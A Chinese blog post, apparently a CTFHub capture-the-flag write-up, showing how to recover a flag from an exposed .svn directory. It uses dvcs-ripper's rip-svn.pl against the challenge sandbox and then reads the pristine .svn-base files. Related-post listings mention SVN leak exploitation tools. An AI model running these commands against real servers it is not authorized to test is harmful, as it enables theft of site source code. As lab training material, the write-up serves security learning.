信息泄露-SVN泄露(信息泄露 - Subversion)

最新推荐文章于 2025-01-13 14:44:33 发布
原创 最新推荐文章于 2025-01-13 14:44:33 发布 · 718 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#svn #perl #服务器

博客介绍了从服务端旧版本源代码中获取Flag的方法,使用工具dvcs-ripper。先在KALI系统安装perl,从GitHub下载dvcs-ripper并解压,然后按步骤使用该工具,通过执行perl脚本从SVN获取相关文件,最终得到Flag。

Flag 在服务端旧版本的源代码中

这个题目主要是使用工具(dvcs-ripper)

 KALI安装方法

 先安装perl

┌──(root㉿kali)-[~]
└─# sudo apt-get install perl libio-socket-ssl-perl libdbd-sqlite3-perl libclass-dbi-perl libio-all-lwp-perl

https://github.com/kost/dvcs-ripper 下载dvs-ripper。我是直接用浏览器下载到Download下,解压出来使用

工具使用步骤

dvcs-ripper┌──(root㉿kali)-[~/Downloads]
└─# cd dvcs-ripper-master
                                                                                                                    
┌──(root㉿kali)-[~/Downloads/dvcs-ripper-master]
└─# ll
总用量 80
-rw-r--r-- 1 root root  3855  8月 17  2020 hg-decode.pl
-rw-r--r-- 1 root root 18027  8月 17  2020 LICENSE
-rw-r--r-- 1 root root  5597  8月 17  2020 README.md
-rwxr-xr-x 1 root root  6401  8月 17  2020 rip-bzr.pl
-rwxr-xr-x 1 root root  4717  8月 17  2020 rip-cvs.pl
-rwxr-xr-x 1 root root 15114  8月 17  2020 rip-git.pl
-rwxr-xr-x 1 root root  6102  8月 17  2020 rip-hg.pl
-rwxr-xr-x 1 root root  6157  8月 17  2020 rip-svn.pl
                                                                                                                    
┌──(root㉿kali)-[~/Downloads/dvcs-ripper-master]
└─# perl ./rip-svn.pl -u http://challenge-a7f19eac21db43aa.sandbox.ctfhub.com:10800/.svn/
[i] Found new SVN client storage format!
REP INFO => 1:file:///opt/svn/ctfhub:e43e7ef8-82fb-4194-9673-81c29de69c33
[i] Trying to revert the tree, if you get error, upgrade your SVN client!
已恢复“index.html”
                                                                                                                    
┌──(root㉿kali)-[~/Downloads/dvcs-ripper-master]
└─# tree .svn                          
.svn
├── entries
├── format
├── pristine
│   ├── 46
│   │   └── 4686299be782a1432aed98556b0326d568d66c9e.svn-base
│   └── bf
│       └── bf45c36a4dfb73378247a6311eac4f80f48fcb92.svn-base
├── text-base
├── tmp
├── wc.db
└── wc.db-journal

5 directories, 6 files
                                                                                                                    
┌──(root㉿kali)-[~/Downloads/dvcs-ripper-master]
└─# cat 4686299be782a1432aed98556b0326d568d66c9e.svn-base
cat: 4686299be782a1432aed98556b0326d568d66c9e.svn-base: 没有那个文件或目录
                                                                                                                    
┌──(root㉿kali)-[~/Downloads/dvcs-ripper-master]
└─# cat bf45c36a4dfb73378247a6311eac4f80f48fcb92.svn-base
cat: bf45c36a4dfb73378247a6311eac4f80f48fcb92.svn-base: 没有那个文件或目录
                                                                                                                    
┌──(root㉿kali)-[~/Downloads/dvcs-ripper-master]
└─# cat ./svn/bf45c36a4dfb73378247a6311eac4f80f48fcb92.svn-base
                                                                                                                    
┌──(root㉿kali)-[~/Downloads/dvcs-ripper-master]
└─# ll
总用量 84
-rw-r--r-- 1 root root  3855  8月 17  2020 hg-decode.pl
-rw-r--r-- 1 root root   221 10月 30 08:29 index.html
-rw-r--r-- 1 root root 18027  8月 17  2020 LICENSE
-rw-r--r-- 1 root root  5597  8月 17  2020 README.md
-rwxr-xr-x 1 root root  6401  8月 17  2020 rip-bzr.pl
-rwxr-xr-x 1 root root  4717  8月 17  2020 rip-cvs.pl
-rwxr-xr-x 1 root root 15114  8月 17  2020 rip-git.pl
-rwxr-xr-x 1 root root  6102  8月 17  2020 rip-hg.pl
-rwxr-xr-x 1 root root  6157  8月 17  2020 rip-svn.pl
                                                                                                                    
┌──(root㉿kali)-[~/Downloads/dvcs-ripper-master]
└─# cat .svn/pristine/46/4686299be782a1432aed98556b0326d568d66c9e.svn-base
ctfhub{4ea39273d38cecaefeae5a9a}
                                                                                                                    
┌──(root㉿kali)-[~/Downloads/dvcs-ripper-master]
└─# cat .svn/pristine/bf/bf45c36a4dfb73378247a6311eac4f80f48fcb92.svn-base    
<html>

<head>
    <meta charset="UTF-8" />
    <title>CTFHub 信息泄露 SVN</title>
</head>

<body>
    <h1>信息泄露 - Subversion</h1>
    <br/>
    <p>Flag 在服务端旧版本的源代码中</p>
</body>

</html>                                                                                                                    
┌──(root㉿kali)-[~/Downloads/dvcs-ripper-master]
└─#

【漏洞挖掘】——60、SVN信息泄露漏洞检测利用
Fly_鹏程万里
10-20 2195
SVN是一个开放源代码的版本控制系统,在使用SVN管理本地代码过程中会自动生成一个名为.svn的隐藏文件夹,其中包含重要的源代码信息,网站管理员在发布代码时如果没有使用导出功能,而是直接复制代码文件夹到WEB服务器上,这就使.svn隐藏文件夹被暴露于外网环境,可以利用.svn/entries文件获取到服务器源码。
CTFHub - 信息泄露 -- SVN
m0_52920608的博客
01-28 916
CTFHub svn泄露
svn信息泄露实战测试
逍遥小哥的博客
05-15 2929
1.下载工具 SvnExploit(其中有针对1.7版本以下和1.7版本以上 两个不同的使用命令)2.目录爆破或扫描器扫出svn信息泄露的路径。4.使用工具开始检测并下载网页源代码。3.访问查看svn版本。
[CTFHub]SVN泄露(web>信息泄露
ZXW_NUDT的博客
05-08 3463
写在前面: 如果下面有内容看不懂的话可以参考我以前写的文章↓ [CTFHub]Log(web>信息泄露>Git泄露)——详细解析 [CTFHub]Stash(web>信息泄露>Git泄露) [CTFHub]Index(web>信息泄露>Git泄露) 首先按照惯例用dirsearch扫描↓ python dirsearch.py -u http://challenge-32f3c6fcb13e2dea.sandbox.ctfhub.com:10080/ -e * 然后发现有SVN泄露 首先先下...
svn源码泄露漏洞
weixin_33847182的博客
07-10 884
服务器上布署代码时。如果是使用 svn checkout 功能来更新代码,而没有配置好目录访问权限,则会存在此漏洞。黑客利用此漏洞,可以下载整套网站的源代码。 一、.svn 目录 使用svn checkout后,项目目录下会生成隐藏的.svn文件夹(Linux上用ls命令看不到,要用ls -al命令)。 svn1.6及以前版本会在项目的每个文件夹下都生成一个.svn文件夹,里面包含了所有文...
关于信息泄露(1)SVN泄露
2301_81841047的博客
04-24 1674
SVN产生的.svn目录下还包含了以.svn-base结尾的源代码文件副本(低版本SVN具体路径为text-base目录,高版本SVN为pristine目录),如果服务器没有对此类后缀做解析,黑客则可以。(具体使用,我也不太了解,我也还没有用过SVN),反正我的理解,我感觉这个SVN有点像一个开放式的云平台,只是功能比较局限化和专一化,因为他们的本质我感觉都是,文件被储存到了一个不属于本地电脑的虚拟平台上,然后哪个用户需要,再分别发送给他。首先,介绍一下,SVN是什么。纯小白,如有错误,欢迎纠正。
Seay-Svn源代码泄露漏洞扫描工具
07-08
SVNsubversion)是源代码版本管理软件,造成SVN源代码漏洞的主要原因是管理员操作不规范。“在使用SVN管理本地代码过程中,会自动生成一个名为.svn的隐藏文件夹,其中包含重要的源代码信息。但一些网站管理员在...
Seay-Svn源代码泄露漏洞利用工具.rar
02-18
隐患描述:SVNsubversion)是源代码版本管理软件,造成SVN源代码漏洞的主要原因是管理员操作不规范。“在使用SVN管理本地代码过程中,会自动生成一个名为.svn的隐藏文件夹,其中包含重要的源代码信息。但一些网站...
Seay-Svn源代码泄露漏洞扫描工具.zip
03-01
Seay-Svn源代码泄露漏洞扫描工具是一款专为开发者和安全人员设计的工具,用于检测SVNSubversion)版本控制系统中的源代码泄露问题。在软件开发过程中,SVN是常用的版本控制工具,它帮助团队协作管理代码版本,但...
Seay-Svn.zip
08-17
通过运行这个工具,用户可以检查目标服务器是否存在SVN泄露的漏洞,并可能获取到敏感的源代码信息,这对于提升网站的安全性具有重要意义。 **如何防范SVN源代码泄露:** 1. **正确配置SVN服务器**:确保仓库路径不...
SVN源代码泄露利用工具
05-05
直接将漏洞地址粘贴至工具中,即可下载网站源代码
SVN信息泄漏利用工具
11-22
SVN信息泄漏利用工具
CTFHub-Web-信息泄露-SVN泄露
qq_54037445的博客
11-19 1044
CTFHub-信息泄露-SVN泄露
SVN泄露
qq_69100706的博客
07-17 1349
Subversion (SVN) 泄露是指在使用 Subversion 版本控制系统的过程中,由于不当的配置、疏忽或错误,导致敏感信息或整个项目的源代码被未经授权的访问者获取。:如果SVN仓库被错误地配置为公开可读,那么任何人都可以通过网络浏览器或者SVN客户端访问到仓库的内容,包括所有的版本历史记录和文件。:在将网站或应用程序部署到服务器时,如果服务器的目录结构配置不当,可能会暴露.svn目录,这个目录包含了仓库的元数据和文件版本,从而泄露源代码和其他敏感信息。
.svn信息泄露
肉面飞龙的博客
11-12 1713
生产环境或者外网服务器一定要注意svn信息的保护 否则会被不怀好意的人利用 例如: http://www.baidu.com/.svn/entries 解决方法 apache设置RewriteEngine on RewriteRule \.svn\/ /404.html当svn cp或者co的时候尽量加上–no-auth-cache 如果不加的话就可以在下面的目录里看到你的用户名密码 里
浅谈“SVN信息泄露
→_→
07-09 3885
一:漏洞名称: SVN信息泄露、版本管理工具文件信息泄漏 描述: SVNsubversion)是程序员常用的源代码版本管理软件。一旦网站出现SVN漏洞,其危害远比SQL注入等其它常见网站漏洞更为致命,因为黑客获取到网站源代码后,一方面是掠夺了网站的技术知识资产,另一方面,黑客还可通过源代码分析其它安全漏洞,从而对网站服务器及用户数据造成持续威胁。更严重的问题在于,SVN产生的.svn目录下还包含了以.svn-base结尾的源代码文件副本(低版本SVN具体路径为text-base目录,高版本
SVN信息泄露漏洞
weixin_47493074的博客
09-19 2482
SVN信息泄露漏洞
SVN信息泄露分析
看不尽的尘埃——博客
11-19 4310
什么是SVN? SVNsubversion)是源代码版本管理软件。 问题如何产生? 在使用SVN管理本地代码过程中,会自动生成一个隐藏文件夹,其中包含重要的源代码信息。但一些网站管理员在发布代码时,不愿意使用‘导出’功能,而是直接复制代码文件夹到WEB服务器上,这就使隐藏文件夹被暴露于外网环境,这使得渗透工程师可以借助其中包含版本信息追...
CTFHub技能树-SVN泄露
最新发布
weixin_52049690的博客
01-13 1421
Subversion (SVN) 泄露是指在当开发人员使用 SVN 进行版本控制,对站点自动部署的过程中,由于不当的配置、疏忽或错误,导致敏感信息或整个项目的源代码被未经授权的访问者获取。这种泄露可能发生在多种情况下,包括但不限于以下几种:公开暴露的SVN仓库:如果SVN仓库被错误地配置为公开可读,那么任何人都可以通过网络浏览器或者SVN客户端访问到仓库的内容,包括所有的版本历史记录和文件。
Seay-Svn:便捷SVN源码泄露漏洞利用工具
然而,如果网站在部署过程中未能正确处理SVN相关的文件和目录,这些敏感信息可能会被无意中泄露到公共访问区域。 SVN版本控制系统通常会包含一个名为.svn的隐藏目录,其中存储了项目的历史版本、配置信息、代码库等...
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值